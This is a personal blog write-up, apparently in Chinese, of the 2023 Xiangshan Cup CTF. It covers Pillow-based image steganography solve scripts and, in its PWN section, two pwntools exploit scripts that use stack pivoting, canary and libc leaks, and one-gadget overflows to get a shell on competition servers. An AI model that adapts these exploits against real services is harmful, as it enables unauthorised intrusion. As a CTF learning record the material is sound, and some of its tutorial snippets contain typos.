2023香山杯复现与学习[231016]

Juana_2u 记录来时的路
  2023-10-18 20:02:45 2023-10-18 20:02:45 Created   2023-11-09 20:04:43 2023-11-09 20:04:43 Updated    

MISC

PINTU

STU:图片隐写

使用python库:pillow&PIL

安装

1
pip install Pillow

使用方法

  1. 使用open加载图片

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    from PIL import Image
    im = Image.open('Mycat.jpg') #im是一个Image对象,属性有format,size,mode
    #format是格式,size是元组,表示宽和高,mode是图片的模式

    ---------------------------------------------------------------------------------------
    from PIL import Image
    im = Image.open('Mycat.jpg')
    print im.format, im.size,im.mode

    ---------------------------------------------------------------------------------------
    #console输出如下:
    JPEG(245,280) RGB

  2. 使用show来调试和测试,呈现图片

    1
    2
    3
    from PIL import Image
    im = Image.open('Mycat.jpg')
    im.show()

  3. 图片的读写操作

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    infile = 'Mycat.jpg'
    f,e = os.path.splitext(infile)
    outfile = f + '.png'
    try:
    Image.open(infile).save(outfile)
    except IOError
    print "cannot convert",infile

    --------------------------------------------------------------------------------------
    #image.open() 读文件
    #image.save() 保存文件  save方法来进行图片的格式转换
    #os模块中的os.path.splitext() 方法可以讲文件名和拓展名分离开,图片的格式转换

  4. 图片的操作

    1. 图片剪切

      1
      2
      3
      4
      5
      6
      7
      im = Image.open('Mycat.jpg')
      box = (150,150,245,280)
      region = im.crop(box)
      region.show()

      ---------------------------------------------------------------------------
      #crop() 方法来从图片中剪切一块区域,上面是提取矩形

    2. 图片黏贴

      1
      2
      3
      4
      5
      6
      7
      im = Image.open('Mycat.jpg')
      box = (50,50,200,200)
      region = im.crop(box)
      #逆转180到原来位置
      region = region.transpose(Image.ROTATE_180)
      im.paste(region,box)
      im.show()

  5. 图像序列

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    form PIL import image
    im = Image.open("cat.gif")
    im.seek(1)
    im.show()

    try:
    while 1:
    im.seek(im.tell()+1)
    im.show()
    except EOFError
    pass

    ---------------------------------------------------------------------------------
    #GIF多帧图片,即序列文件,PIL自动打开序列文件的第一帧,seek和tell方法在不同帧移动
    #tell-->帧数 seek-->取当前帧数

    ----------------------------------------------------------------------------------
    #while循环
    from PIL import Image
    im = Image.open("cat.gif")
    im.seek(1)
    im.show()

    try:
    while 1:
    im.seek(im.tell()+1)
    im.show()
    except EOERROr
    pass

    ---------------------------------------------------------------------------------
    #for循环 ImageSequence模块的Iterator方法
    from PIL import Image
    from PIL import ImageSequence
     
    im = Image.open("cat.gif")
    for frame in ImageSequence.Iterator(im):
    frame.show()

  6. 读取像素和修改像素

EXP1:PINTU

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
import os
from PIL import Image
from Crypto.Util.number import *

path = r"./pintu"
file_list = os.listdir(path) #路径下的所有文件
size_list = []

bin_data = " " #获取二进制
for i in range(1,4704):
    im_path = path +f"\{i}.png"
    im = Image.open(im_path)

    size = im.size
    size_list.append(size[1])

    pixel = im.getpixel((0,0)) #获取图像中的像素的RGB颜色值 getpixel的参数是一个像素点的坐标
    # RGB模式(RED,GREEN,BLUE) (0,0)表示像素点的坐标
    if pixel ==(0,0,0):    #二进制白色是0
        bin_data += "0"
    else:
        bin_data +="1"

print("BIN_DATA:",bin_data) #打印二进制
int_data = int(bin_data,2) #解码二进制
print("INT_DATA:",int_data)
print("DATA_OUT:",long_to_bytes(int_data).decode())
print("\n")

size_data = ""
for i in range(len(size_list)):
    size_data += chr(int(str(size_list[i]),8)) #高度size 10进制改为8进制
print("SIZE_DATAL:",size_data)

data = size_data.split(" ")
data_out = ""
for i in range(len(data)):
    data_out += chr(int(data[i]))
print("DATA_OUT:",data_out)

运行结果:

1
2
3
4
5
6
7
8
9
10
11
12
D:\CollegeStudy\Python_code\venv\Scripts\python.exe D:/CTF_Tools/CTF_Scripts/MISC/PINTU.py
BIN_DATA:  11001100110110001100001011001111110011110011100100010111110010110001000101100000011011000110110001101100110001111100110100110001010111111100100101110001000110111100110100110001010111111100111100010011011100111100101100010001010101111100101100001011011010011100101101001011000101111101111101111001000110011100101101111101000100011100101100011111010111111100110100000111001110001100110011011000110000101100111111001011011100110110110111001001011100010001101111001011001110010101000111010001011111110011001111000111000000010000010111011111011110010001000111001111000101110010111111001011010010010110100111001001011111110011101111001011001000110111101111011111011110010001001111011111011110010001100111001101001011110100010111001111000010010110110111010001011010110110000111001011000100010110000111001001011101010000110111010001011111110011001111010011000011110001100111011111011110010001100111010011000001010100011111001101000100010010001111001001011100110011111111001111011101110011001111001001011100010000000111001001011100010101010111010011000000010011010111001011000010110110011111001111001101010000100111001011000010110110011111010011001010010101110111001001011111110100001111001101000000110101111111001101000101110111111111001011000111010111011111001011001000010100111111011111011110010001100111001011000111010111011111001101000100110111110111001011000100010110000111001111001110010011111111001101010110110100011111001111001101010000100011001100110110001100001011001111110010110010000101001111110111110111100100110100111001101010101011101100110001101110101001101010111001001100111010100110110010101000001011011010100101001010001010000110110011001100100010110000111010001000101010011010100101101001001010000100011100100110001010011000110101000110011011011100110100101001111011011110011010001101000011110010101011000110000011000100010111100110010011000010111101001110000011110000011100001001000011100010101101001010000001101100111011101101011001101110100011101001110011011000101010001000110010110010100010001010010001010110101011100100000001000000010000000100000001000000010000000100000001000000010000000100000001000000010000000100000001000000010000000100000001000000010000000100000001000000010000000100000001000000010000000100000001000000010000000100000001000000010000000100000001000000010000011100101100100111000111011101111101111001000110011100101101011111011100111100100101110101000011011100011100000001000001011100110100010111011111111101000101101011011000011100100101110011000101111100101100010011000110111100111100111001000101111100100101110001000000011100111100111001000101111100110100010001001000111100111101100101011111011100101101111111000001111100110100011001001000111101001100000001000100111100111100110101000010011100111101011001001000111101000101011111001110111100101100100001010011111101111101111001001101011100111100011001000111011100100101110101011101011100110100010011001001111100111100011001000111011101111101111001000110011100110100111001001110111100111100010111001000011100111100010111011100011100101101111001000000011100110100111101010101011101111101111001000110011100010100000001001110011100111101000001011000011100010100000001001110111100101100111001011000011100100101110001000000011100101101000111011000011100110100111101010101011100101100100111000110111100100101110011000101111100101100100001000111011100111100011001000111011100100101110101011101011100110101011011011101111100100101110101000011011100011100000001000001011100111100010111001000011100111100010111011100011100101100011111000100111100111100111011000000011101000100001011011000011101111101111001000110011100101100001101011011111100111101011001001000111100100101110001000000011100101101000111011000011101111101111001001101000001010111000101000000010011100111001101011001010100001111001101000001110110011111001011000100010110000111001011001000010100111111011111011110010001100111001101000100010010001111001101001100010101111111001011000111110001101111001011011000010000100111001011011110010100111111000111000000010000010111000101000000010011101111001011010010110111101111001001011100010001101111001011010010110111101111001111010110010010001111011111011110010001100001000001110011010011100100010011110011010110010101000011110011010011100100010011110011010000100100111111110100010100111100010011110010010111000100000001110010110010011100001101110010110010111101001101110111110111100100011001110010110100100101001111110100010000100100100011110011010011011101101001110011010111000100001011110011010011001101100001110010010111010100001101110001110000000100000101110000010111000100001011101010110011110111000101000000010100010111011111011101110001100111000101000000010100010110101011001111000100000111000001011100010010101
INT_DATA: 443872932387609604135299396505741465548187173913201730108838080408785609137741615659037699726062198174374869846350512862150233184688689942668777612350764221752081411865206415112660714146757211490177058729438092152878841125207571476701274343774749929595131015975243112000147909250609222224386395250420482153027423916850849907783377689363926605283859634466699503398576742091148637222466493674839458477079907442027781797995563797242127070058619307420720083582989814955638708836061722624212645970329914685584560535046789049745626271660729695633393935782143286042187281494621731489627398825041304828103510723776145870421596844268308768106563173361340578036769631671222365662779295856082169735142106857685245787867868939877997807147264885029965288918778095901444599350328636038539550470594610996135016178903533546176756754366885849810986458832457425478791696994121501106351218323543932789426433991366669735850704517003574890852690894671642558319499970231221568249671785792844423548113062674756417573895156509357966378010843640665977535211058606619931728275406042671149290064241331353833192521327454578922439604729609725523724886701113628781775137675047788670751939245996145899093702530500651486751530440279280899185557843975159425298926732152946633813864493232128464695128151024516359972838671657905047765173875917851092890649577562083138460019500783760812685048126396136492082495748040267453981267617425848056387144300693
DATA_OUT: flag看到666c是不是特别兴奋,很可惜flag并不在这。(狗头保命),既然走到了这里,那我也给一个通关的关键信息拿去吧,去找到真正的flag吧:sUvcu5rgSeAmJQCfdXtEMKIB91Lj3niOo4hyV0b/2azpx8HqZP6wk7GNlTFYDR+W                                 哎,对了。拿走之前看一看我精心挑选的笑话吧:猎人打猎,朝狐狸开枪,“砰”地一声枪响之后猎人死了。狐狸叉着腰,冷笑一声:
“没想到吧,我是反射弧。”好不好笑, 有没有感觉一哆嗦,大脑更清晰了。ฅ՞•ﻌ•՞ ต

SIZE_DATAL: 74 82 70 84 67 53 83 70 71 53 83 85 52 83 84 86 72 66 84 84 67 82 50 83 75 86 83 69 50 78 75 86 73 85 89 70 67 83 50 77 79 86 70 85 87 77 76 76 71 86 75 87 73 84 75 76 74 90 83 69 50 78 75 86 77 82 70 85 87 89 51 69 74 85 51 86 75 90 67 78 71 86 75 85 50 83 75 81 77 78 88 69 50 87 67 86 77 82 71 84 75 86 75 78 77 77 50 88 77 82 75 76 71 69 50 85 83 53 83 69 79 70 87 84 77 82 68 82 78 90 86 84 79 53 76 78 71 90 67 71 89 87 68 86 79 86 89 85 71 53 75 89 75 86 87 84 77 82 68 82 77 82 66 71 52 90 68 78 71 90 74 69 52 84 76 87 73 82 89 87 73 84 74 86 79 86 87 84 77 85 83 79 77 82 71 88 75 52 76 79 78 77 50 86 75 51 74 87 73 82 87 71 73 84 74 86 77 82 87 84 77 85 83 86 74 86 51 70 69 86 76 69 74 85 50 88 75 90 67 67 78 90 75 87 73 84 74 86 74 90 83 69 50 78 75 86 78 90 86 84 79 86 76 69 74 85 50 86 67 87 68 86 71 86 75 85 75 84 76 69 79 70 87 84 77 82 68 77 77 82 71 84 75 86 75 89 79 85 51 88 73 82 74 87 75 74 75 71 73 84 74 86 75 86 83 71 69 79 68 81 78 74 50 85 87 87 67 76 71 66 50 87 87 84 68 67 79 85 51 69 87 81 82 81 74 82 67 88 75 87 68 70 77 82 66 68 73 78 76 74 71 86 88 69 85 83 82 80 77 70 69 85 87 53 84 89 79 70 70 69 69 87 67 84 79 82 71 86 81 83 66 82 78 78 74 72 75 83 50 72 75 82 68 88 73 86 83 83 79 86 69 88 69 53 74 87 78 74 71 87 67 87 67 76 73 74 73 88 65 84 66 88 78 90 86 85 89 81 82 82 79 86 73 86 77 77 68 78 79 82 70 87 75 82 50 74 79 74 70 85 50 83 50 74 71 66 76 69 75 84 75 81 79 70 71 85 52 85 75 71 74 78 50 70 69 85 67 78 75 89 50 69 81 81 75 79 75 86 70 85 50 84 74 86 76 66 88 69 83 83 51 78 77 81 88 86 77 78 90 90 75 89 50 85 81 84 74 80 77 86 83 85 50 83 50 82 73 78 85 88 75 77 76 86 75 70 67 87 54 52 75 76 74 77 90 88 79 50 74 86 74 78 69 71 73 54 74 81 79 53 71 68 75 86 74 87 79 81 51 84 65 77 83 76 74 86 70 70 85 50 83 78 71 65 89 87 52 89 50 89 77 70 71 87 87 85 83 73 78 74 50 87 89 53 51 69 71 65 52 87 89 84 74 87 72 66 52 71 83 90 50 76 74 73 52 87 69 78 68 87 74 81 51 84 75 84 66 84 71 53 76 69 52 53 68 72 74 78 83 85 85 76 90 86 79 66 70 70 77 77 74 83 74 78 50 85 50 78 83 82 77 52 89 84 83 79 75 87 77 69 90 69 89 78 51 66 79 81 52 85 75 90 76 68 78 70 71 86 81 52 83 78 74 78 73 85 85 79 74 88 78 90 51 70 67 50 51 79 79 74 70 88 79 78 76 90 75 70 69 84 81 77 84 79 73 52 51 86 71 83 75 78 75 66 75 84 67 86 83 81 73 78 85 87 69 78 67 76 71 70 68 87 67 89 84 74 74 85 50 71 73 83 76 72 71 82 51 84 71 52 83 82 73 77 90 85 69 83 50 89 78 90 68 84 65 77 68 85 74 85 89 69 75 84 74 81 71 86 52 69 83 54 74 82 78 86 70 87 71 77 67 85 74 73 51 88 75 78 50 78 75 90 52 69 52 53 67 72 71 66 50 68 71 89 84 66 75 70 77 72 83 51 51 88 73 86 72 71 75 54 75 70 79 52 89 84 67 81 50 67 71 82 90 71 52 86 83 89 73 70 73 87 69 54 68 88 73 78 90 69 87 52 66 84 73 53 81 85 67 50 76 83 71 53 76 69 83 86 84 79 73 70 50 69 52 89 75 84 71 77 51 84 73 86 67 75 77 73 89 84 69 51 75 72 74 77 88 88 73 89 51 80 73 53 50 69 75 51 84 86 78 70 90 69 87 89 75 78 79 53 76 71 87 50 83 67 75 90 89 69 75 53 90 85 78 81 90 88 75 79 68 88 76 66 67 87 52 77 74 82 75 90 70 86 65 90 67 76 75 77 51 68 83 89 82 89 75 66 88 69 52 78 67 73 74 74 86 84 69 52 75 70 75 90 73 84 65 50 75 74 77 82 51 85 87 81 82 85 77 70 85 87 69 78 68 87 74 74 72 70 67 78 68 78 78 78 74 70 71 77 90 88 77 69 88 88 73 89 84 66 75 66 73 85 50 90 74 80 74 73 88 86 67 83 75 89 79 73 50 72 85 53 68 72 75 77 51 85 83 82 74 90 79 70 71 83 54 52 50 79 71 70 68 86 81 85 51 74 71 65 89 85 87 50 84 88 71 82 65 85 83 53 75 69 75 66 88 69 50 50 50 50 74 82 84 84 71 52 66 82 73 85 50 84 77 79 75 78 71 74 51 85 67 84 82 86 73 90 86 69 83 87 67 78 78 90 82 85 87 86 83 76 74 85 50 69 77 53 67 79 74 77 51 86 67 53 90 82 77 82 88 68 65 51 90 88 78 70 67 84 75 87 67 75 74 90 73 87 77 77 76 68 71 82 69 87 85 81 84 80 74 90 85 88 83 77 66 88 78 70 84 86 81 83 67 76 73 73 90 86 73 50 84 67 78 82 73 69 75 50 50 76 71 90 69 87 69 85 84 77 74 85 50 87 67 90 74 90 74 86 52 70 85 50 83 74 77 86 68 70 81 86 82 88 71 70 70 71 87 85 66 89 74 74 90 71 52 54 67 89 71 85 89 72 83 87 66 80 71 85 52 69 87 89 82 81 74 70 86 71 69 77 76 76 78 86 86 84 83 52 75 78 79 81 52 68 75 83 83 72 76 65 89 68 71 82 74 86 78 66 70 85 83 78 75 70 78 90 72 68 73 50 67 70 79 85 51 85 50 77 50 78 77 70 87 85 71 83 75 83 77 70 77 71 87 78 50 87 71 77 51 84 65 79 66 84 70 52 50 69 69 90 68 67 72 70 87 70 81 84 76 77 79 65 90 85 87 86 74 85 78 70 66 68 83 84 83 76 77 78 74 88 65 84 66 87 75 73 51 70 81 89 90 82 71 90 88 71 87 79 68 67 71 78 68 84 83 78 90 82 75 90 74 68 81 90 67 78 71 86 75 87 73 84 74 86 71 86 86 72 75 77 75 78 74 81 51 86 67 78 50 78 74 69 51 87 71 90 66 87 79 78 88 84 67 52 82 86 78 77 52 85 75 89 76 66 78 74 69 84 75 76 90 82 79 82 74 70 85 50 84 67 71 78 77 84 83 89 82 86 79 52 89 85 75 79 76 76
DATA_OUT: JRFTC5SFG5SU4STVHBTTCR2SKVSE2NKVIUYFCS2MOVFUWMLLGVKWITKLJZSE2NKVMRFUWY3EJU3VKZCNGVKU2SKQMNXE2WCVMRGTKVKNMM2XMRKLGE2US5SEOFWTMRDRNZVTO5LNGZCGYWDVOVYUG5KYKVWTMRDRMRBG4ZDNGZJE4TLWIRYWITJVOVWTMUSOMRGXK4LONM2VK3JWIRWGITJVMRWTMUSVJV3FEVLEJU2XKZCCNZKWITJVJZSE2NKVNZVTOVLEJU2VCWDVGVKUKTLEOFWTMRDMMRGTKVKYOU3XIRJWKJKGITJVKVSGEODQNJ2UWWCLGB2WWTDCOU3EWQRQJRCXKWDFMRBDINLJGVXEUSRPMFEUW5TYOFFEEWCTORGVQSBRNNJHKS2HKRDXIVSSOVEXE5JWNJGWCWCLIJIXATBXNZVUYQRROVIVMMDNORFWKR2JOJFU2S2JGBLEKTKQOFGU4UKGJN2FEUCNKY2EQQKOKVFU2TJVLBXESS3NMQXVMNZZKY2UQTJPMVSU2S2RINUXKMLVKFCW64KLJMZXO2JVJNEGI6JQO5GDKVJWOQ3TAMSLJVFFU2SNGAYW4Y2YMFGWWUSINJ2WY53EGA4WYTJWHB4GSZ2LJI4WENDWJQ3TKTBTG5LE45DHJNSUULZVOBFFMMJSJN2U2NSRM4YTSOKWMEZEYN3BOQ4UKZLDNFGVQ4SNJNIUUOJXNZ3FC23OOJFXONLZKFETQMTOI43VGSKNKBKTCVSQINUWENCLGFDWCYTJJU2GISLHGR3TG4SRIMZUES2YNZDTAMDUJUYEKTJQGV4ES6JRNVFWGMCUJI3XKN2NKZ4E45CHGB2DGYTBKFMHS33XIVHGK6KFO4YTCQ2CGRZG4VSYIFIWE6DXINZEW4BTI5QUC2LSG5LESVTOIF2E4YKTGM3TIVCKMIYTE3KHJMXXIY3PI52EK3TVNFZEWYKNO5LGW2SCKZYEK5ZUNQZXKODXLBCW4MJRKZFVAZCLKM3DSYRYKBXE4NCIJJVTE4KFKZITA2KJMR3UWQRUMFUWENDWJJHFCNDNNNJFGMZXMEXXIYTBKBIU2ZJPJIXVCSKYOI2HU5DHKM3USRJZOFGS642OGFDVQU3JGAYUW2TXGRAUS5KEKBXE2222JRTTG4BRIU2TMOKNGJ3UCTRVIZVESWCNNZRUWVSLJU2EM5COJM3VC5ZRMRXDA3ZXNFCTKWCKJZIWMMLDGREWUQTPJZUXSMBXNFTVQSCLIIZVI2TCNRIEK22LGZEWEUTMJU2WCZJZJV4FU2SJMVDFQVRXGFFGWUBYJJZG46CYGUYHSWBPGU4EWYRQJFVGEMLLNVVTS4KNOQ4DKSSHLAYDGRJVNBFUSNKFNZHDI2CFOU3U2M2NMFWUGSKSMFMGWN2WGM3TAOBTF42EEZDCHFWFQTLMOAZUWVJUNFBDSTSLMNJXATBWKI3FQYZRGZXGWODCGNDTSNZRKZJDQZCNGVKWITJVGVVHKMKNJQ3VCN2NJE3WGZBWONXTC4RVNM4UKYLBNJETKLZRORJFU2TCGNMTSYRVO4YUKOLL
#解码顺序
#base32
#base64 码表:sUvcu5rgSeAmJQCfdXtEMKIB91Lj3niOo4hyV0b/2azpx8HqZP6wk7GNlTFYDR+W
#base64

得到一张png图片

jiemi

使用npiet工具来运行这个花不拉几的语言图片程序得到flag

flag

flag{4b6c1737-27e5-41c4-95e3-f70ad196063e}

piet编程语言:面向堆栈的语言,颜色区域表示数字,

EXP2:逆序图片

1
2
3
4
5
6
7
8
# coding:utf-8 
# author:Reborn 
 
f1 = open('flag.jpg','rb+')
f2 = open('fla.jpg','wb+')
f2.write(f1.read()[::-1])
f1.close()
f2.close()

EXP3:GIF拆解拼接

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# coding:utf-8 
# author:Reborn 
from PIL import Image
 
savepath = "OmyGods\\"
path = '.\\'
 
im = Image.open('glance.gif')
try:
im.save(savepath+'glance{:d}.png'.format(im.tell()))
while True:           #while循环拆解
im.seek(im.tell()+1)  #提取帧数
im.save(savepath+'glance{:d}.png'.format(im.tell()))
except:
pass
#得到帧数

创建大图,将每一帧图片贴上去,im是创建好的大图,然后使用im.paste(image,(width,0,2+width,600))方法,4元坐标,高度不变,宽度每次加2(每一帧的宽度)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# coding:utf-8 
# author:Reborn 
from PIL import Image
path = "OmyGods\\"
save_path = '.\\'
 
im = Image.new('RGBA',(2*201,600))
 
imagefile = []
width = 0 
for i in range(201):
imagefile.append(Image.open(path+'Frame'+str(i)+'.png'))
 
for image in imagefile:
im.paste(image,(width,0,2+width,600))
width = width +2
im.save(save_path+'OmyGod.png')
im.show()

PWN

move

栈迁移的知识,没看懂什么原理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#!/usr/bin/env python3
# -*- coding:utf-8 -*-

from pwn import *
context.clear(arch='amd64', os='linux', log_level='debug')

#sh = remote('47.93.188.210', 40848)

sh.sendafter(b'lets travel again!\n', flat([0x405f00, 0x40121A, 0, 0]))
sh.sendafter(b'setp number', p32(0x12345678))

sh.sendafter(b'TaiCooLa', cyclic(48) + flat([0x4050A0, 0x40124b]))
sh.sendafter(b'TaiCooLa', flat([0x405e00, 0x401353, 0x404018, 0x401080, 0x40121A, 0, 0x405ed0, 0x000000000040124b]))
libc_addr = u64(sh.recvn(6) + b'\0\0') - 0x80970
success('libc_addr: ' + hex(libc_addr))
sh.sendafter(b'TaiCooLa', flat([0x405d00, libc_addr + 0x4f302, 0x404018, 0x401080, 0x40121A, 0, 0x405dd0, 0x000000000040124b]))

sh.interactive()

pwthon

通过测试找到触发漏洞的PoC:

1
2
3
4
5
6
sh = remote(attach_host, 9541)
sh.sendlineafter(b'> ', b'0')
sh.send(b'0' * 0x100 + b'1' * 0x180)
sh.recvuntil(b'gift ')
app_addr = int(sh.recvline(), 16) - 0x68b0
success('app_addr: ' + hex(app_addr))

根据Poc编写利用脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#!/usr/bin/env python3
# -*- coding:utf-8 -*-

from pwn import *
context.clear(arch='amd64', os='linux', log_level='debug')

sh = remote('101.201.35.76', 45057)

sh.sendlineafter(b'> ', b'0')

sh.send(b'0' * 0xd9)
sh.recvuntil(b'0' * 0xd9)
canary = u64(b'\0' + sh.recvn(7))
success('canary: ' + hex(canary))
sh.send(b'0')

sh.sendlineafter(b'> ', b'0')
sh.send(b'2' * 0x20)
sh.recvuntil(b'2' * 0x20)
libc_addr = u64(sh.recvn(6) + b'\0\0') - 0x4473b0
success('libc_addr: ' + hex(libc_addr))
sh.send(b'0')

sh.sendlineafter(b'> ', b'0')
sh.send(b'1234')
sh.recvuntil(b'gift ')
sh.recvuntil(b'1234')
sh.send(cyclic(264) + flat([canary, 0, libc_addr + 0x4f302]) + b'\0' * 0x60)

sh.interactive()
  • Title: 2023香山杯复现与学习[231016]
  • Author: Juana_2u
  • Created at : 2023-10-18 20:02:45
  • Updated at : 2023-11-09 20:04:43
  • Link: https://juana-2u.github.io/2023/10/18/2023XiangShan-Replay/
  • License: This work is licensed under CC BY-NC-SA 4.0.
On this page
2023香山杯复现与学习[231016]
  1. MISC
    1. PINTU
      1. STU:图片隐写
      2. EXP1:PINTU
      3. EXP2:逆序图片
      4. EXP3:GIF拆解拼接
  2. PWN
    1. move
    2. pwthon